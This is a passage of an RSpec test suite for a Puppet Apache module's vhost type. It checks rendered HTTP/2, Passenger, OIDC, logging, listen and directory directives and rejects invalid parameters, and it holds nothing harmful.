is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2CopyFiles\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2Direct\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2EarlyHints\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2MaxSessionStreams\s100$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2ModernTLSOnly\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2Push\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2PushDiarySize\s256$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2PushPriority\sapplication/json 32$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2PushResource\s/css/main.css$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2PushResource\s/js/main.js$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2SerializeHeaders\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2StreamMaxMemSize\s65536$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2TLSCoolDownSecs\s1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2TLSWarmUpSize\s1048576$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2Upgrade\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-http2').with(
content: %r{^\s+H2WindowSize\s65535$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerEnabled\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerBaseURI\s/app$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerRuby\s/usr/bin/ruby1\.9\.1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerPython\s/usr/local/bin/python$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerNodejs\s/usr/bin/node$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMeteorAppSettings\s/path/to/some/file.json$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerAppEnv\stest$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerAppRoot\s/usr/share/myapp$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerAppGroupName\sapp_customer$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerAppType\srack$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerStartupFile\sbin/www$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerRestartDir\stmp$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerSpawnMethod\sdirect$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerLoadShellEnvvars\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerRollingRestarts\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerResistDeploymentErrors\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerUser\ssandbox$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerGroup\ssandbox$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerFriendlyErrorPages\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMinInstances\s1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxInstances\s30$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxPreloaderIdleTime\s600$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerForceMaxConcurrentRequestsPerProcess\s10$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerStartTimeout\s600$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerConcurrencyModel\sthread$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerThreadCount\s5$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxRequests\s1000$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxRequestTime\s2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMemoryLimit\s64$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerStatThrottleRate\s5$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-file_footer').with(
content: %r{^PassengerPreStart\shttp://localhost/myapp$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerHighPerformance\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerBufferUpload\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerBufferResponse\sOff$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerErrorOverride\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxRequestQueueSize\s10$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerMaxRequestQueueTime\s2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerStickySessions\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerStickySessionsCookieName\s_nom_nom_nom$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerAllowEncodedSlashes\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerDebugger\sOn$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-passenger').with(
content: %r{^\s+PassengerLveMinUid\s500$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCProviderMetadataURL\shttps:\/\/login.example.com\/\.well-known\/openid-configuration$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCClientID\stest$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCRedirectURI\shttps:\/\/login\.example.com\/redirect_uri$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCProviderTokenEndpointAuth\sclient_secret_basic$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCRemoteUserClaim\ssub$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCClientSecret\saae053a9-4abf-4824-8956-e94b2af335c8$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-auth_oidc').with(
content: %r{^\s+OIDCCryptoPassphrase\s4ad1bb46-9979-450e-ae58-c696967df3cd$},
)
}
end
context 'vhost with multiple ip addresses' do
let :params do
{
'port' => '80',
'ip' => ['127.0.0.1', '::1'],
'ip_based' => true,
'servername' => 'example.com',
'docroot' => '/var/www/html',
'add_listen' => true,
'ensure' => 'present',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{[.\/m]*<VirtualHost 127.0.0.1:80 \[::1\]:80>[.\/m]*$},
)
}
it { is_expected.to contain_concat__fragment('Listen 127.0.0.1:80') }
it { is_expected.to contain_concat__fragment('Listen [::1]:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost 127.0.0.1:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost [::1]:80') }
end
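        # Illustration: the expectations above correspond to rendered Apache
        # configuration roughly of this shape (paraphrased from the matched
        # fragments, not exact template output):
        #
        #   Listen 127.0.0.1:80
        #   Listen [::1]:80
        #   <VirtualHost 127.0.0.1:80 [::1]:80>
        #     ServerName example.com
        #     ...
        #   </VirtualHost>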
context 'vhost with multiple ports' do
let :params do
{
'port' => ['80', '8080'],
'ip' => '127.0.0.1',
'ip_based' => true,
'servername' => 'example.com',
'docroot' => '/var/www/html',
'add_listen' => true,
'ensure' => 'present',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{[.\/m]*<VirtualHost 127.0.0.1:80 127.0.0.1:8080>[.\/m]*$},
)
}
it { is_expected.to contain_concat__fragment('Listen 127.0.0.1:80') }
it { is_expected.to contain_concat__fragment('Listen 127.0.0.1:8080') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost 127.0.0.1:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost 127.0.0.1:8080') }
end
context 'vhost with multiple ip addresses, multiple ports' do
let :params do
{
'port' => ['80', '8080'],
'ip' => ['127.0.0.1', '::1'],
'ip_based' => true,
'servername' => 'example.com',
'docroot' => '/var/www/html',
'add_listen' => true,
'ensure' => 'present',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{[.\/m]*<VirtualHost 127.0.0.1:80 127.0.0.1:8080 \[::1\]:80 \[::1\]:8080>[.\/m]*$},
)
}
it { is_expected.to contain_concat__fragment('Listen 127.0.0.1:80') }
it { is_expected.to contain_concat__fragment('Listen 127.0.0.1:8080') }
it { is_expected.to contain_concat__fragment('Listen [::1]:80') }
it { is_expected.to contain_concat__fragment('Listen [::1]:8080') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost 127.0.0.1:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost 127.0.0.1:8080') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost [::1]:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost [::1]:8080') }
end
context 'vhost with ipv6 address' do
let :params do
{
'port' => '80',
'ip' => '::1',
'ip_based' => true,
'servername' => 'example.com',
'docroot' => '/var/www/html',
'add_listen' => true,
'ensure' => 'present',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{[.\/m]*<VirtualHost \[::1\]:80>[.\/m]*$},
)
}
it { is_expected.to contain_concat__fragment('Listen [::1]:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost [::1]:80') }
end
context 'vhost with wildcard ip address' do
let :params do
{
'port' => '80',
'ip' => '*',
'ip_based' => true,
'servername' => 'example.com',
'docroot' => '/var/www/html',
'add_listen' => true,
'ensure' => 'present',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-apache-header').with(
content: %r{[.\/m]*<VirtualHost \*:80>[.\/m]*$},
)
}
it { is_expected.to contain_concat__fragment('Listen *:80') }
it { is_expected.not_to contain_concat__fragment('NameVirtualHost *:80') }
end
context 'modsec_audit_log' do
let :params do
{
'docroot' => '/rspec/docroot',
'modsec_audit_log' => true,
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-security').with(
content: %r{^\s*SecAuditLog "\/var\/log\/#{apache_name}\/rspec\.example\.com_security\.log"$},
)
}
end
context 'modsec_audit_log_file' do
let :params do
{
'docroot' => '/rspec/docroot',
'modsec_audit_log_file' => 'foo.log',
}
end
it { is_expected.to compile }
it {
is_expected.to contain_concat__fragment('rspec.example.com-security').with(
content: %r{\s*SecAuditLog "\/var\/log\/#{apache_name}\/foo.log"$},
)
}
end
context 'set only aliases' do
let :params do
{
'docroot' => '/rspec/docroot',
'aliases' => [
{
'alias' => '/alias',
'path' => '/rspec/docroot',
},
],
}
end
it { is_expected.to contain_class('apache::mod::alias') }
end
context 'proxy_pass_match' do
let :params do
{
'docroot' => '/rspec/docroot',
'proxy_pass_match' => [
{
'path' => '.*',
'url' => 'http://backend-a/',
'params' => { 'timeout' => 300 },
},
],
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(
%r{ProxyPassMatch .* http:\/\/backend-a\/ timeout=300},
).with_content(%r{## Proxy rules})
}
end
context 'proxy_dest_match' do
let :params do
{
'docroot' => '/rspec/docroot',
'proxy_dest_match' => '/',
}
end
it { is_expected.to contain_concat__fragment('rspec.example.com-proxy').with_content(%r{## Proxy rules}) }
end
context 'not everything can be set together...' do
let :params do
{
'access_log_pipe' => '/dev/null',
'error_log_pipe' => '/dev/null',
'docroot' => '/var/www/foo',
'ensure' => 'absent',
'manage_docroot' => true,
'logroot' => '/tmp/logroot',
'logroot_ensure' => 'absent',
'directories' => [
{
'path' => '/var/www/files',
'provider' => 'files',
'allow' => ['from 127.0.0.1', 'from 127.0.0.2'],
'deny' => ['from 127.0.0.3', 'from 127.0.0.4'],
'satisfy' => 'any',
},
{
'path' => '/var/www/foo',
'provider' => 'files',
'allow' => 'from 127.0.0.5',
'deny' => 'from all',
'order' => 'deny,allow',
},
],
}
end
it { is_expected.to compile }
it { is_expected.not_to contain_class('apache::mod::ssl') }
it { is_expected.not_to contain_class('apache::mod::mime') }
it { is_expected.not_to contain_class('apache::mod::vhost_alias') }
it { is_expected.not_to contain_class('apache::mod::wsgi') }
it { is_expected.not_to contain_class('apache::mod::passenger') }
it { is_expected.not_to contain_class('apache::mod::suexec') }
it { is_expected.not_to contain_class('apache::mod::rewrite') }
it { is_expected.not_to contain_class('apache::mod::alias') }
it { is_expected.not_to contain_class('apache::mod::proxy') }
it { is_expected.not_to contain_class('apache::mod::proxy_http') }
it { is_expected.not_to contain_class('apache::mod::headers') }
it { is_expected.to contain_file('/var/www/foo') }
it {
is_expected.to contain_file('/tmp/logroot').with('ensure' => 'absent')
}
it {
is_expected.to contain_concat('25-rspec.example.com.conf').with('ensure' => 'absent')
}
it { is_expected.to contain_concat__fragment('rspec.example.com-apache-header') }
it { is_expected.to contain_concat__fragment('rspec.example.com-docroot') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-aliases') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-itk') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-fallbackresource') }
it { is_expected.to contain_concat__fragment('rspec.example.com-directories') }
      # The following style is only present on Apache 2.2,
      # which is used on SLES 11, RHEL 6, and Amazon Linux.
if (facts[:os]['family'] == 'RedHat' && facts[:os]['release']['major'].to_i < 7) ||
(facts[:os]['name'] == 'Amazon') ||
(facts[:os]['name'] == 'SLES' && facts[:os]['release']['major'].to_i < 12)
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Allow from 127\.0\.0\.1$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Allow from 127\.0\.0\.2$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Allow from 127\.0\.0\.5$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Deny from 127\.0\.0\.3$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Deny from 127\.0\.0\.4$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Deny from all$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Satisfy any$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-directories').with(
content: %r{^\s+Order deny,allow$},
)
}
end
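      # For reference (not rendered by this spec itself): the 2.2-style
      # directives asserted above and the 2.4-style directive asserted in the
      # 'default of require all granted' context correspond roughly to:
      #
      #   # Apache 2.2 (SLES 11, RHEL 6, Amazon Linux)
      #   Order deny,allow
      #   Deny from all
      #   Allow from 127.0.0.1
      #   Satisfy any
      #
      #   # Apache 2.4 and newer
      #   Require all granted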
it { is_expected.not_to contain_concat__fragment('rspec.example.com-additional_includes') }
it { is_expected.to contain_concat__fragment('rspec.example.com-logging') }
it { is_expected.to contain_concat__fragment('rspec.example.com-serversignature') }
it { is_expected.to contain_concat__fragment('rspec.example.com-access_log') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-action') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-block') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-error_document') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-proxy') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-redirect') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-rewrite') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-scriptalias') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-serveralias') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-setenv') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-ssl') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-sslproxy') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-suphp') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-php_admin') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-header') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-requestheader') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-wsgi') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-custom_fragment') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-fastcgi') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-suexec') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-charsets') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-limits') }
it { is_expected.to contain_concat__fragment('rspec.example.com-file_footer') }
end
context 'wsgi_application_group should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_application_group' => '%{GLOBAL}',
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'wsgi_daemon_process should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_daemon_process' => { 'foo' => { 'python-home' => '/usr' }, 'bar' => {} },
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'wsgi_import_script on its own should not set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_import_script' => '/var/www/demo.wsgi',
}
end
it { is_expected.not_to contain_class('apache::mod::wsgi') }
end
context 'wsgi_import_script_options on its own should not set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_import_script_options' => {
'process-group' => 'wsgi',
'application-group' => '%{GLOBAL}',
},
}
end
it { is_expected.not_to contain_class('apache::mod::wsgi') }
end
context 'wsgi_import_script and wsgi_import_script_options should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_import_script' => '/var/www/demo.wsgi',
'wsgi_import_script_options' => {
'process-group' => 'wsgi',
'application-group' => '%{GLOBAL}',
},
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'wsgi_process_group should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_daemon_process' => 'wsgi',
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'wsgi_script_aliases with non-empty aliases should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_script_aliases' => {
'/' => '/var/www/demo.wsgi',
},
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'wsgi_script_aliases with empty aliases should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_script_aliases' => {},
}
end
it { is_expected.not_to contain_class('apache::mod::wsgi') }
end
context 'wsgi_pass_authorization should set apache::mod::wsgi' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_pass_authorization' => 'On',
}
end
it { is_expected.to contain_class('apache::mod::wsgi') }
end
context 'when not setting nor managing the docroot' do
let :params do
{
'docroot' => false,
'manage_docroot' => false,
}
end
it { is_expected.to compile }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-docroot') }
end
context 'ssl_proxyengine without ssl' do
let :params do
{
'docroot' => '/rspec/docroot',
'ssl' => false,
'ssl_proxyengine' => true,
}
end
it { is_expected.to compile }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-ssl') }
it { is_expected.to contain_concat__fragment('rspec.example.com-sslproxy') }
end
context 'ssl_proxy_protocol without ssl_proxyengine' do
let :params do
{
'docroot' => '/rspec/docroot',
'ssl' => true,
'ssl_proxyengine' => false,
'ssl_proxy_protocol' => 'TLSv1.2',
}
end
it { is_expected.to compile }
it { is_expected.to contain_concat__fragment('rspec.example.com-ssl') }
it { is_expected.not_to contain_concat__fragment('rspec.example.com-sslproxy') }
end
describe 'access logs' do
context 'single log file' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'access_log_file' => 'my_log_file',
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-access_log').with(
content: %r{^\s+CustomLog.*my_log_file" combined\s*$},
)
}
end
context 'single log file with environment' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'access_log_file' => 'my_log_file',
'access_log_env_var' => 'prod',
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-access_log').with(
content: %r{^\s+CustomLog.*my_log_file" combined\s+env=prod$},
)
}
end
context 'multiple log files' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'access_logs' => [
{ 'file' => '/tmp/log1', 'env' => 'dev' },
{ 'file' => 'log2' },
{ 'syslog' => 'syslog', 'format' => '%h %l' },
],
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-access_log').with(
content: %r{^\s+CustomLog "\/tmp\/log1"\s+combined\s+env=dev$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-access_log').with(
content: %r{^\s+CustomLog "\/var\/log\/#{apache_name}\/log2"\s+combined\s*$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-access_log').with(
content: %r{^\s+CustomLog "syslog" "%h %l"\s*$},
)
}
end
end # access logs
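    # Rendered output sketch (illustrative, not asserted verbatim): the three
    # `access_logs` entries above correspond roughly to these CustomLog lines,
    # where <apache_name> is the distro-specific log directory name:
    #
    #   CustomLog "/tmp/log1" combined env=dev
    #   CustomLog "/var/log/<apache_name>/log2" combined
    #   CustomLog "syslog" "%h %l"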
describe 'error logs format' do
context 'on Apache 2.2' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'apache_version' => '2.2',
'error_log_format' => ['[%t] [%l] %7F: %E: [client\ %a] %M% ,\ referer\ %{Referer}i'],
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging')
.without_content(%r{ErrorLogFormat})
}
end
context 'single log format directive as a string' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'apache_version' => '2.4',
'error_log_format' => ['[%t] [%l] %7F: %E: [client\ %a] %M% ,\ referer\ %{Referer}i'],
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat "\[%t\] \[%l\] %7F: %E: \[client\\ %a\] %M% ,\\ referer\\ %\{Referer\}i"$},
)
}
end
context 'multiple log format directives' do
let(:params) do
{
'docroot' => '/rspec/docroot',
'apache_version' => '2.4',
'error_log_format' => [
'[%{uc}t] [%-m:%-l] [R:%L] [C:%{C}L] %7F: %E: %M',
{ '[%{uc}t] [R:%L] Request %k on C:%{c}L pid:%P tid:%T' => 'request' },
{ "[%{uc}t] [R:%L] UA:'%+{User-Agent}i'" => 'request' },
{ "[%{uc}t] [R:%L] Referer:'%+{Referer}i'" => 'request' },
{ '[%{uc}t] [C:%{c}L] local\ %a remote\ %A' => 'connection' },
],
}
end
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat "\[%\{uc\}t\] \[%-m:%-l\] \[R:%L\] \[C:%\{C\}L\] %7F: %E: %M"$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat request "\[%\{uc\}t\] \[R:%L\] Request %k on C:%\{c\}L pid:%P tid:%T"$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat request "\[%\{uc\}t\] \[R:%L\] UA:'%\+\{User-Agent\}i'"$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat request "\[%\{uc\}t\] \[R:%L\] Referer:'%\+\{Referer\}i'"$},
)
}
it {
is_expected.to contain_concat__fragment('rspec.example.com-logging').with(
content: %r{^\s+ErrorLogFormat connection "\[%\{uc\}t\] \[C:%\{c\}L\] local\\ %a remote\\ %A"$},
)
}
end
end # error logs format
describe 'validation' do
context 'bad ensure' do
let :params do
{
'docroot' => '/rspec/docroot',
'ensure' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad suphp_engine' do
let :params do
{
'docroot' => '/rspec/docroot',
'suphp_engine' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad ip_based' do
let :params do
{
'docroot' => '/rspec/docroot',
'ip_based' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad access_log' do
let :params do
{
'docroot' => '/rspec/docroot',
'access_log' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad error_log' do
let :params do
{
'docroot' => '/rspec/docroot',
'error_log' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
      context 'bad ssl' do
let :params do
{
'docroot' => '/rspec/docroot',
'ssl' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad default_vhost' do
let :params do
{
'docroot' => '/rspec/docroot',
'default_vhost' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad ssl_proxyengine' do
let :params do
{
'docroot' => '/rspec/docroot',
'ssl_proxyengine' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad rewrites' do
let :params do
{
'docroot' => '/rspec/docroot',
'rewrites' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad rewrites 2' do
let :params do
{
'docroot' => '/rspec/docroot',
'rewrites' => ['bogus'],
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'empty rewrites' do
let :params do
{
'docroot' => '/rspec/docroot',
'rewrites' => [],
}
end
it { is_expected.to compile }
end
context 'bad suexec_user_group' do
let :params do
{
'docroot' => '/rspec/docroot',
'suexec_user_group' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad wsgi_script_alias' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_script_alias' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad wsgi_daemon_process_options' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_daemon_process_options' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad wsgi_import_script_alias' do
let :params do
{
'docroot' => '/rspec/docroot',
'wsgi_import_script_alias' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad itk' do
let :params do
{
'docroot' => '/rspec/docroot',
'itk' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad logroot_ensure' do
let :params do
{
'docroot' => '/rspec/docroot',
          'logroot_ensure' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad log_level' do
let :params do
{
'docroot' => '/rspec/docroot',
'log_level' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad error_log_format flag' do
let :params do
{
'docroot' => '/rspec/docroot',
'error_log_format' => [
{ 'some format' => 'bogus' },
],
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'access_log_file and access_log_pipe' do
let :params do
{
'docroot' => '/rspec/docroot',
'access_log_file' => 'bogus',
'access_log_pipe' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'error_log_file and error_log_pipe' do
let :params do
{
'docroot' => '/rspec/docroot',
'error_log_file' => 'bogus',
'error_log_pipe' => 'bogus',
}
end
it { is_expected.to raise_error(Puppet::Error) }
end
context 'bad fallbackresource' do
let :params do
{
'docroot' => '/rspec/docroot',
'fallbackresource' => 'bogus',
}
end
